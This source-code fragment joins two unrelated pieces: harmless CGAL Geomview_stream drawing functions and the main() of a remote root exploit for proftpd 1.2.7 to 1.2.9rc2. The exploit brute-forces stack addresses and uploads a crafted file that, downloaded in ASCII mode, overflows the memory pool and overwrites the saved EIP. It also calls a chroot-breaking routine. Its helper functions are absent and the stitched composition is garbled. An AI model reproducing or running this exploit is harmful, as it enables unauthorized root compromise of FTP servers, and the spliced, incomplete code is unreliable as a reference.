void
Geomview_stream::set_bg_color(const Color &c)
{
bool ascii_bak = set_ascii_mode();
*this << "(backcolor \"Camera\" "
<< double(c.r())/255.0
<< double(c.g())/255.0
<< double(c.b())/255.0
<< ")";
set_ascii_mode(ascii_bak);
}
void
Geomview_stream::pickplane(const Bbox_3 &bbox)
{
bool bin_bak = set_binary_mode();
(*this) << "(geometry pickplane {QUAD BINARY\n"
<< 1
// here are the four corners
<< bbox.xmin() << bbox.ymin() << bbox.zmin()
<< bbox.xmin() << bbox.ymax() << bbox.zmin()
<< bbox.xmax() << bbox.ymax() << bbox.zmin()
<< bbox.xmax() << bbox.ymin() << bbox.zmin()
// close the text bracket
<< "}) (pickable pickplane no)";
set_ascii_mode(bin_bak);
}
int main(int argc,char **argv)
{
int sleepMode=0;
char c;
unsigned int stackStartAddr=STACK_START;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
switch (c) {
case 't':
server=optarg;
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localIP=optarg;
break;
case 's':
sleepMode=1;
break;
case 'U':
strncpy(uploadPath,optarg,SIZE);
break;
case 'P':
ftpPort=atoi(optarg);
break;
case 'S':
stackStartAddr=strtoul(optarg, NULL, 16);
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || localIP==NULL)
usage(argv[0]);
printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
printf(" by Haggis ([email protected])\n");
doris_chroot_breaker();
for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {
if(check_for_linefeed()==FAILURE)
continue;
retAddr=stackWriteAddr+200; // good enough for show business
if((controlSock=connect_to_server(ftpPort))==FAILURE) {
perror("\n\nFailing to connect to remote host\n");
exit(1);
}
if(login_to_server()==FAILURE) {
close(controlSock);
printf("\nERROR: Login failed.\n");
exit(1);
}
if(set_passive_mode(UPLOAD)==FAILURE)
goto err;
if(set_ascii_mode()==FAILURE)
goto err;
if(set_path_and_filename()==FAILURE)
goto err;
// create the buffer containing RET for this
// brute-force iteration
create_exploit_buffer();
if(upload_file()==FAILURE)
goto err;
close(controlSock);
// Connect again, then login, set ASCII mode and download the exploit file.
// This will trigger the overflow; as a result, we've
// corrupted the memory pool of this session and when we
// download the file again, the stack area will be overwritten
// and we control the saved EIP.
if((controlSock=connect_to_server(ftpPort))<0) {
perror("\nFailed to connect to remote host\n");
exit(1);
}
login_to_server(user,pass);
set_path_and_filename();
if(set_ascii_mode()==FAILURE)
goto err;
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(sleepMode)
sleep(10);
if(download_file(NORMAL_DOWNLOAD)==FAILURE)
goto err;
// Finally, read the file again. This will trigger the stack
// overwrite (NOT the overflow, that happened earlier). We could
// control EIP at this point and r00t may be only heartbeat away...
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
goto err;
err:
close(controlSock);
}
// This is only reached if the bruteforce fails.
// delete the exploit files here
printf("\n\nNo r00t for you today I'm afraid.\n");
exit(1);
}
